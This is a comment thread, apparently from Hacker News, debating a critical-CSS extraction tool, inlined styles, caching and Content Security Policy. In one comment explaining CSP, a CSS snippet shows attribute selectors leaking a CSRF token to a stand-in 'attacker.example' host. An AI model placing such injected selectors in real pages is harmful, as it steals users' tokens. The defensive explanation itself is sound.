Nice one. Would be cool if this also handled responsiveness. The need to dedupe responsive critical styles has made me resort to manually editing all critical stylesheets I've ever made.
I also see that this brings in CSS variable definitions (sorry, ~custom properties~) and things like that. Since critical CSS's size matters so much, it might be worth giving an option to compile all of that down.
> Place your original non-critical CSS <link> tags just before the closing </body> tag
I don't recommend doing this: you still want the CSS downloaded urgently, critical CSS is a façade. Moving to the end of body means the good stuff is discovered late, and thus downloaded late (and will block render if the preloader[0] discovers it).
These days I'd recommend:
[0] https://web.dev/articles/preload-scanner
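One way to keep the full stylesheet discovered early while still inlining critical CSS (a sketch with placeholder paths, not necessarily what's being recommended above): keep at least a preload for it in the head, so the bytes are in flight no matter where the real link ends up.

    <head>
      <style>
        /* inlined critical (above-the-fold) rules */
      </style>
      <!-- Fetched urgently by the preload scanner, even if applied later -->
      <link rel="preload" href="/css/site.css" as="style">
    </head>
    ...
    <!-- Wherever this ends up in the document, the download already started -->
    <link rel="stylesheet" href="/css/site.css">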
The prefetch attribute and other HTTP header hints, combined with a proper CDN setup, do almost the same thing, and would not require the critical CSS to be rebuilt nonstop as the page develops. A properly configured CF is insanely fast.
> HTTP header hints
I assume it's either 103 Early Hints or Resource Hints in HTTP/1.1 and 2.0.
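For reference, these hints look roughly like this in markup, and the same hint can travel as a Link header (host and paths are placeholders):

    <link rel="preconnect" href="https://cdn.example.com">
    <link rel="preload" href="/css/site.css" as="style">

    <!-- Or as an interim response sent before the final 200:
         HTTP/1.1 103 Early Hints
         Link: </css/site.css>; rel=preload; as=style -->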
+1 on responsiveness
I wouldn’t use the JS hack to load CSS…
When the stylesheet loads and is applied to the CSSOM, it's going to trigger layout and style calculations for the elements it's applied to, maybe even the whole page.
Browsers are pretty eager at fetching stylesheets, even those at the bottom of the page.
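For context, the "JS hack" being referred to is presumably the usual deferred-stylesheet pattern (loadCSS-style), something like this, with a placeholder file name:

    <link rel="preload" href="/css/full.css" as="style"
          onload="this.onload=null;this.rel='stylesheet'">
    <noscript><link rel="stylesheet" href="/css/full.css"></noscript>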
That stylesheet application was going to happen anyway, the difference now is that FCP will occur before it.
> Browsers are pretty eager at fetching stylesheets, even those at the bottom of the page
Browsers begin fetching resources as they discover them. For a big enough document, that means low-placed resources will suffer.
Sure, that work is going to happen anyway, but often what you see is multiple stylesheets loaded using the async hack, which results in multiple style and layout calculations, as the browser can't coalesce them because it doesn't know that they're stylesheets or when they will arrive.
The whole philosophy of critical styles being those above the fold is a mistake, in my view.
Far better to adopt approaches like those recommended by Andy Bell that dramatically reduce stylesheet size.
And do critical styles “correctly”, i.e. load those that are needed to render the initial page, and load the ones that rely on interactions separately.
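A sketch of that split (file names and the trigger element are made up): the styles needed for the initial render load normally, and the styles only needed after an interaction are fetched the first time the interaction happens.

    <head>
      <!-- Needed to render the initial page -->
      <link rel="stylesheet" href="/css/base.css">
    </head>
    <body>
      <button id="open-modal">Settings</button>
      <script>
        // The modal's styles are only fetched the first time it is opened.
        document.getElementById('open-modal').addEventListener('click', () => {
          const link = document.createElement('link');
          link.rel = 'stylesheet';
          link.href = '/css/modal.css';
          document.head.appendChild(link);
        }, { once: true });
      </script>
    </body>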
Feels like premature optimisation to me. Are there really cases where the CSS is so complex or the page loads so many resources that this effort is worthwhile? Maybe with the most complex web apps, I guess, but for almost all cases, I would have thought writing clean CSS, HTML, and JavaScript would render this unnecessary or even counterproductive.
Oh my god, yes, this is useful. I do some freelance dev work for a small marketing agency, and I inherit a lot of Wordpress sites that show all the hallmarks of passing through multiple developers/agencies over the years, and the CSS and Javascript are *always* crufty with years of accumulated bad practices. I'm eager to try this.
> Are there really cases where the CSS is so complex or the page loads so many resources that this effort is worthwhile?
On the contrary, the more complex the css is or the more resources loaded, the less this would be worthwhile.
The thing I think they are trying to optimize is latency due to RTT. When you first request the HTML file, the browser needs to read it before knowing the next thing to request. This requires a round trip to the server, which has latency (pesky speed of light). The larger your (critical) CSS, the more expensive this optimisation is, so the less likely it is a net benefit.
I would have paid good money for this tool ~12 years ago. We had a site with enormous amounts of CSS that had accumulated over the years, and it was really unclear which rules were and which weren't critical.
For many sites, this probably is a premature optimization. But for sites that live off of click-through, like news/media, getting the text on screen is critical. Bounce rate starts to go up and ad revenue drops as soon as page loads are less than "immediate", which is about 1 second. The full page can actually be quite heavy once all the ads, scripts, and media load.
We were doing this optimization more than a decade ago when I worked at HuffPost.
Seriously. When I look at the modern state of front-end development, it's actually fucking bonkers to me. Stuff like Lighthouse has caused people to reach for optimizations that are completely absurd.
This might make an arbitrary number go up in test suites, at the cost of massively increasing build complexity and reducing ease of working on the project, all for very minimal (if any) improvement for the hypothetical end user, who will be subject to much greater forces outside the developer's control, like their network speed.
I see so much stuff like this, then regularly see websites that are riddled with what I would consider to be very basic user interface and state management errors. It's absolutely infuriating.
Yup. Give people a number or stat to obsess over and they'll obsess over it (while ignoring the more meaningful work like stability and fixing real, user-facing bugs).
Over-obsession with KPIs/arbitrary numbers is one of the side-effects of managerial culture that badly needs to die.
It’s just a few meaningful numbers: 0 accessibility errors, an A+ on securityheaders.com, a flawless result on Webbkoll (5july.net), plus below 1 second loading time on PageSpeed mobile. Once that has been achieved, the obsession with stabilizing a flaky bloated pudding while patching over bugs (aka features that annoy any user) will have died.
>Feels like premature optimisation to me.
To me thinking about how CSS loads is task #1, but I probably have some unique needs.
We were losing clients due to our web offering scoring poorly on page speed tests. Page speed being part of how a page is ranked can affect SEO (depending on who you ask), so it is very important to our clients. It's not my job to explain how I think SEO works, it's my job to make our clients happy.
I had to design a whole new system to get page speed scores to 100% on Google Lighthouse, which many of our clients were using to test their site's performance. When creating a site optimized for performance, how the CSS and JS and everything else loads needs to be thought about before implementing the pages. It can be pretty difficult to optimize these things after the fact.

We made pretty much everything on the page load inline, including JS and CSS, and the CSS for what displays "above the fold" loads above the HTML it styles. Everything "below the fold" gets loaded below the fold. No FOUC, nothing blocking the rendering of the page. No extra HTTP requests are made to load any of the content. A lot of the JS "below the fold" does not even get evaluated until it is scrolled into view, because that can also slow down page load speed.

I took all the advice Google Lighthouse was giving me and implemented our pages in a way that satisfies it completely. It wasn't really that difficult, but it required changing my thinking about how to approach building websites.
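The "below-the-fold JS only gets evaluated when scrolled into view" part can be done with an IntersectionObserver; a minimal sketch (the element id and script path are hypothetical, not this commenter's actual setup):

    <section id="reviews">…</section>
    <script>
      // Inject and evaluate the widget script only when its section nears the viewport.
      const observer = new IntersectionObserver((entries) => {
        if (entries.some((entry) => entry.isIntersecting)) {
          const script = document.createElement('script');
          script.src = '/js/reviews.js';
          document.body.appendChild(script);
          observer.disconnect();
        }
      }, { rootMargin: '200px' });
      observer.observe(document.getElementById('reviews'));
    </script>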
We were coming from a system that we didn't control, where they decided to load all of the CSS for the entire website on every page, which was amounting to about 3 to 4 MB of CSS alone, and the Javascript was even worse. There was never an attempt to optimize that system from the start, and now many years later they can't seem to optimize it at all. I won't name that system because we still build on it, but it's a real problem for us when a client compares their SEO and page speed scores to their competitors and then they leave us for our competitors, which score only a bit better for page speed.
If performance is the goal, there is no such thing as premature optimization, it has to be thought about from the start. So far our clients have been very happy about their 100% page speed scores (100% even on mobile), and our competition can't come anywhere close, unless they put in the work and start thinking differently about the problem.
I actually tried the tool that is the subject of this post on my sites, and it wouldn't work - likely because there is nothing to optimize. We simply don't do any HTTP requests for CSS, and the CSS we need "above the fold" is already "above the fold". I tried it on one of the old pages and it did give a result, but I don't need it because we don't build pages like we used to anymore.
When I tested mine, I got the following:
Built on Astro web framework
HTML: 27.52KB uncompressed (6.10KB compressed)
JS: <10KB (compressed)
Critical CSS: 57KB uncompressed (7KB compressed) — tested using this site for performance analysis.
In comparison, many similar sites range from 100KB (uncompressed) to as much as 1MB.
The thing is, I can build clean HTML with no inline CSS or JavaScript. I also added resource hints (not Early Hints, since my Nginx setup doesn't support that out of the box), which slightly improve load times when combined with HTTP/2 and short-interval caching via Nginx. This setup allows me to hit a 100/100 performance score without relying on Critical CSS or inline JavaScript.
If every page adds 7KB, isn’t it wasteful—especially when all you need is a lightweight SPA or, better yet, more edge caching to reduce the carbon footprint? We don’t need to keep transmitting unnecessary data around the world with bloated HTML like Elementor for WordPress.
Why serve users unnecessary bloat? Mobile devices have limited battery life. It's not impossible to achieve a lightning-fast experience once you move away from shared hosting territory.
It's worth noting that including Critical CSS in every page load isn't the only way to use it.
A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already) or only using the Critical CSS technique for pages that commonly come at the start of a session.
> A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already)
I’ve thought about that before but couldn’t figure out the ideal approach. Using a unique session cookie for non-logged in users isn’t feasible, as it could lead to memory or storage issues if a malicious actor attempts a DDoS attack.
I believe this approach also doesn’t work well for static pages, which are likely already hosted close to users.
One useful trick to keep in mind is that CSS content-visibility only applies in certain scenarios. One agency I came across was using <iframe> for every section, which is a bad idea.
So my conclusion is that mobile-first CSS is generally more practical, plus using a PWA, which I'm building now for a site that has lots of listings.
Yeah, it's a neat trick but kinda pointless. In a world with CDNs and HTTP/2, all this does is waste bandwidth in order to look slightly better in artificial benchmarks.
It might improve time to first paint by 10-20ms, but this is a webpage, not a first-person shooter. Besides, subsequent page loads will be slower.
Yup, wherever we deviated from straightforward asset downloads to optimize something, we always ended up slower or buggier. Like manually downloading display images or using websockets to upload stuff. Turns out servers and browsers have had more person-years spent optimizing this than I ever could.
And critical CSS requires loosening the CSP (Content Security Policy), which I have already hardened almost entirely, along with the Permissions Policy.
Imagine this: before serving the page, a filter seeks out the critical css, inserts it, and removes all css links. Greatly improving page load times and reducing CDN loads.
Edit: on second reading, it seems like you are saying that when another page from the same server with the same style loads again, the CSS would have to be reloaded, and this increases bandwidth in cases where a site visitor loads multiple pages. So yes, it is optimal for conditions where the referrer is external to the site.
This is a footgun. You'll get a very consistent flash of unstyled content. It's not just an aesthetics issue -- when layout shifts in the middle of a page load, as your "non-critical" styles are applied, and the user is interacting with something, it will kill your usability.
Isn't the whole point avoiding FOUC, while also avoiding blocking rendering on CSS network requests?
Unless you're sure that the "non-critical" CSS doesn't cause layout shifts (i.e., it doesn't override any "critical" styles), you're gonna see layout shifts even on fast connections if you load some styles at the top of the document and then do a link rel at the bottom.
The critical css should cover everything above the fold to avoid that visible reflow.
Where’s the fold in a world of thousands of viewports?
Then what does the "non-critical" css do?
The non-critical things?
I mean, i agree with you that this is insanely easy to screw up. However in most websites there is obviously css which doesn't cause reflows and is not needed for first paint. Actually separating that out correctly seems easy to mess up, but it obviously exists.
I searched online for tools to extract the critical CSS of a website for one of my clients, but I couldn't find one that did the job (I even found a paid one, but requested a refund after it didn't work). So I built my own using Puppeteer locally and then decided to share the solution I used; it lets you specify how long to wait after page load before extracting the styles.
Feedback welcome, it's free for now.
What was the problem with something like https://www.npmjs.com/package/penthouse ?
It's worth noting that penthouse's last release is a few weeks shy of 3 years ago (https://github.com/pocketjoso/penthouse/releases/tag/v.2.3.3).
Given there seem to be few other Critical CSS tools out there, its utility in driving web performance, and the fact Google's web.dev recommended tool (https://github.com/addyosmani/critical) uses penthouse under the hood, I'm surprised there isn't more effort and/or sponsorship going into helping maintain it.
FYI: While a bit of an edge case, as I don’t know why anyone would do this realistically… If a site without CSS is passed, it throws an error.
Is the code somewhere? This seems like it'd be really useful as a Vite/Astro plugin
yeah, doing this manual copy-paste process every time you change something would count as cruel and unusual punishment
Is it the UI for penthouse lib? Settings look very similar :)
I guess this just assumes that this is the first view of your page and no user has css resources cached?
Or maybe they are saying this would always be worth it?
I assume it'd be a trade off between a number of factors. How many returning vs new visitors? Is css served with proper cache-control headers, 103 early hints and in a cdn? How big is your critical css, and how much of your critical html does it push out of the initial congestion window?
I prefer a different approach: write your HTML in such a way that the page makes sense and is usable without CSS. It's also a good guiding star for your page's complexity; if your document markup is simple, sensible and meaningful, you're probably not overcomplicating your layout.
This doesn't really work for sites where reading text left to right, top to bottom is not the primary focus.
When I was doing performance examinations from localhost I found that CSS was mostly inconsequential if written at least vaguely efficiently and requested as early as possible from the HTML. By completely removing CSS I might be able to save up to 7ms of load time, but that was extremely hard to tell because that was well within the variance between test intervals.
https://github.com/prettydiff/wisdom/blob/master/performance...
Obviously trying to do an optimization designed to reduce the impact of latency between client <-> server is going to have no impact if you are testing on localhost where latency is already effectively zero.
That's not to say I think this optimization is necessarily worth it, just that testing on localhost is not a good test of this.
Not a fan.
I'm waiting for the day developers realize the fallacy of sticking with pixels as their measurement for Things on the Internet.
With a deeper understanding of CSS, one would recognize that simply parsing it out for only the components "above the fold" (which, why are pixels being used here in such an assumptive manner?), completely misses what is being used in modern CSS today - global variables, content-centric declarations, units based on character-widths, and so many other tools that would negate "needing" to do this in the first place.
Neat idea. I tried it on my site (https://anderegg.ca/) which already inlines its CSS, and got an error from the underlying library (https://www.npmjs.com/package/penthouse):
Hm. When I tried this on my site it retained a debugging element that is decidedly not required, but adds a lot of bytes to the CSS:
(It lets me uncheck the "display: none" rule in the developer tools to get a baseline grid overlaid on the site to make sure things line up. They don't anymore, because I forgot I had that in there until I saw it now!)

I've been away for quite a while, so I'm just thinking out loud.
With tools such as PostCSS, and servers serving zipped styles across a CDN while maintaining a single request for the styles, is there really a benefit to breaking up the styles these days?
Also, I’m going to assume, besides the core styles that run a website, anything that is loaded later can come in with its specific styles as part of the HTML/JS.
For the critical CSS thing, we used to kinda do it by hand, with some automation, more as a toolset to help us decide how much to include (inside the HTML itself, in a `<style>` tag) and then insert the stylesheet. But then we always found it better to set a Stylesheet Budget and work with it.
> serving zipped styles across CDN
CDN assets haven't been cached across domains for years (browsers now partition the cache per site). I.e. using a CDN is no faster than serving the file yourself (usually slower because of the extra DNS lookup, though sometimes slightly faster if the CDN node is geographically closer and the DNS was already looked up).
The performance impact of CDNs is definitely a complicated matter and always has been. They aren't a magic solution to any problem unless you're exceeding the origin's available bandwidth, or are serving up something that should be cacheable but somehow can't live without whatever it is that Elementor does that makes it worth every request taking 75 seconds to complete.
Kind of funny that the agency that made this has a loader on their site.
It would only be ironic if they released a tool to get rid of loading on a page.
> Critical CSS refers to the minimal set of CSS rules required to render the visible portion of a webpage (above the fold).
In reality the tool is aimed to style most of the page without loading additional assets so you don't get a jarring repaint when visiting the site.
I prepared a comment about how the whole thing should be well under 5KB uncompressed, plus four small images and a background video that I couldn’t quite figure out, and about how the loader made no sense and made things worse. But then I checked in Chromium before stopping, and discovered that apparently the website is just completely broken in Firefox for some reason, so that you only get to see the above-the-fold content. But it still definitely hasn’t earned the loader. And also demonstrates why messing with scrolling is a bad idea.
Non-starter for all but hobby websites since it's incompatible with any content security policy disallowing inline style tags.
Edit regarding replies to this comment: I'm sure many will get a kick out of your workarounds and they're all worth posting in the spirit of HN, however I am talking about CSPs that disallow shenanigans. Carry on though :^)
You can allow safe inline CSS with a nonce. For example:
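A minimal sketch, with a placeholder nonce value (it should be generated fresh for every response):

    <style nonce="r4nd0mB4se64">
      /* inlined critical CSS */
      body { margin: 0; }
    </style>

    <!-- Matching response header:
         Content-Security-Policy: style-src 'self' 'nonce-r4nd0mB4se64' -->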
And a CSP like the one sketched above. Here's how I automate mine: https://github.com/uxtely/js-utils/blob/ad7d9531e108403a4146...
It's completely compatible if you separate dynamic content until after the critical CSS is loaded: https://posts.summerti.me/being-unsafe-safely/
> content security policy disallowing inline style tags
Wait, why on earth is this a thing?
The threats solved by restricting CSS with CSP are pretty minor, but generally it's to prevent injection attacks that do the following:
- injecting css to restyle the page as part of a social engineering attack or to otherwise trick the user into doing something stupid
- using css to load an image or something to track users viewing the page or capture their IP address
- leak the values of attributes on the page (you can do complex things with ^= and ~= selectors to leak attribute values). Sometimes page text contents can also be leaked using tricks with fonts and scrollbars (not sure if that still works on modern browsers).
On the whole though, the surface area is small compared to JavaScript. I often see people restrict CSS before JS (or do the JS restrictions incorrectly) because restricting CSS is much easier, but that is really silly, as an attacker will always reach for JavaScript first if it's available.
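To make the attribute-leak point concrete, injected CSS along these lines can exfiltrate an attribute value one prefix at a time (the attacker host is obviously made up):

    <style>
      /* If the csrf input's value attribute starts with "a", the browser
         requests this URL and the attacker learns the first character;
         repeat with longer prefixes to recover the rest. */
      input[name="csrf"][value^="a"] {
        background-image: url("https://attacker.example/leak?prefix=a");
      }
    </style>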
I guess the main case is if user-generated content has an escape bug that lets the user inject a <style> tag?
If only this was about UGC. Most of it can have nothing to do with actual users. Think stuff like ads, or other injects like a dependency of a dependency of a dependency of your frontend app compromised by a North Korean hacker.
That’s a good point, though can’t this instance be whitelisted with a nonce?
You could, but in the real world not every frontend dev has control over the CSP on the server allowing nonces to even be an option.
Even when they do they might be subject to a security audit forbidding it. There's two reasons nonces can suck: first is that nonces may be passed around for 3rd party script usage and that blows a hole in your security policy, and the other is that many implementations to generate nonces are not implemented correctly, so the security team might have less trust in devs.
It really depends on the organization and project. Once you start getting near the security fence you may find it's more trouble than it's worth.
I would try to find less complicated solutions for small details like this. Obvious question might be why your CSS can't be a separate file that is small enough to not cause a performance issue.
I don't really understand the point of this.
On most pages, most of the CSS that gets used below the fold gets used above it too, especially when you consider that it needs to handle large desktop monitors and responsiveness. And the remaining part (e.g. styling a footer) is tiny.
The CSS "bloat" that you might want to delay loading is CSS for the rest of the entire site, including all sorts of legacy stuff that might not even be used anymore.
There are lots of strategies for how to load CSS used only by the page, as opposed to the site, which involve various tradeoffs, but can be worth it.
But loading CSS for part of a page seems almost nonsensical. It's not like lazy-loading large images, where we're sometimes talking about megabytes. The CSS used on any single page is usually pretty small to begin with, and even smaller zipped.
It reduces round-trips. The ultimate goal used to be (in the 2010s) to ensure the initial TCP congestion window (roughly the first 14KB of the response) had everything the browser needed to render the layout without any additional round-trips. Rare to go that extreme these days, of course.
Is there any limit, etc.? It gives an error on my first try.
{"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}
This is a great idea even as a build step in web projects. You set a list of viewports you want to optimize for in your package.json, import critical-css as a dev dependency, configure it in your vite.config.js or equivalent, and away you go.
the amount of tiny tweaks that stack up in css is kinda nuts tbh - always felt like chasing performance can be endless, makes me wonder if any dev really feels satisfied with their setup or if it's just a bunch of tradeoffs
I am. I don't know if it's perfect, but it is more than good enough.
It would be great if it were packaged as a library.
See also beasties ( https://github.com/danielroe/beasties ) formerly critters ( https://github.com/GoogleChromeLabs/critters ) which can be used to do this during SSR/SSG and is built into Nuxt and NextJS
Assuming you are using an atomic-CSS-based framework like Tailwind, this would be unnecessary, right? Since all the CSS class names are inlined on the element anyway.
Your page would still need the full CSS sheet loaded to render properly - Tailwind classes do nothing on their own.
That said, if all of your css is referenced by html classes, it would be trivial to look at the html that's above the fold and derive which css you need to load first which could be kinda cool.
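A rough in-browser sketch of that idea (it only approximates the fold, and ignores media queries, pseudo-classes and descendant selectors):

    <script>
      // Collect the class names used by elements that start above the fold.
      const fold = window.innerHeight;
      const critical = new Set();
      document.querySelectorAll('[class]').forEach((el) => {
        if (el.getBoundingClientRect().top < fold) {
          el.classList.forEach((cls) => critical.add(cls));
        }
      });
      console.log([...critical]); // feed this into whatever filters the stylesheet
    </script>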
Seems to only work if the CSS is an external file.
(Not embedded within the HEAD/STYLE tag)
Why worry about this when companies package 10MB of JavaScript? Is this really where the problem is?
I'm sad to say that the average is now 11MB.
Oh god, it's 10% worse!
If a candy or soda can go from 50g sugar to 40g without a significant change in flavor, they definitely want to. They don't have to get to 5g for it to be worthwhile.
WordPress plugins and builders like Divi and Elementor have been inserting all the CSS for every page part or component anywhere in the body for years. I hate it. But does this critical CSS mean they have been doing it right all along?
No, having an external file makes it cacheable locally. If every new page loads some of the same CSS again and again, it's a waste of bandwidth. You should already have the stylesheet on your computer by then.
I often wonder if this bandwidth is as big a deal as people make it out to be.
On a very high traffic site, sure. Anything smaller and I’d argue you should just shove everything down the pipe in one request if you can.
If the bandwidth bothers you, delete an image. You likely don’t have anywhere near that amount in CSS to make up.
Thank you.
Can anybody tell me why I got two downvotes on my question?
Not working in Safari. Says ‘done’ but Generated CSS box remains empty
Does not work in IE11 either :(
> Better Lighthouse scores
What does that mean? What is Lighthouse?
https://developer.chrome.com/docs/lighthouse/overview
The performance audit in Chrome.
This comes in handy with the bloated codebase I am running from, bravo.
My problem is the codebase I am running towards. I am making headway with scoped CSS; however, Firefox does not have it yet. I keep checking in on Firefox to see when it is going to support scoped CSS, but I have not been able to determine what the hold-up is.
Does anyone have scoped CSS working with a workaround or compromise for Firefox?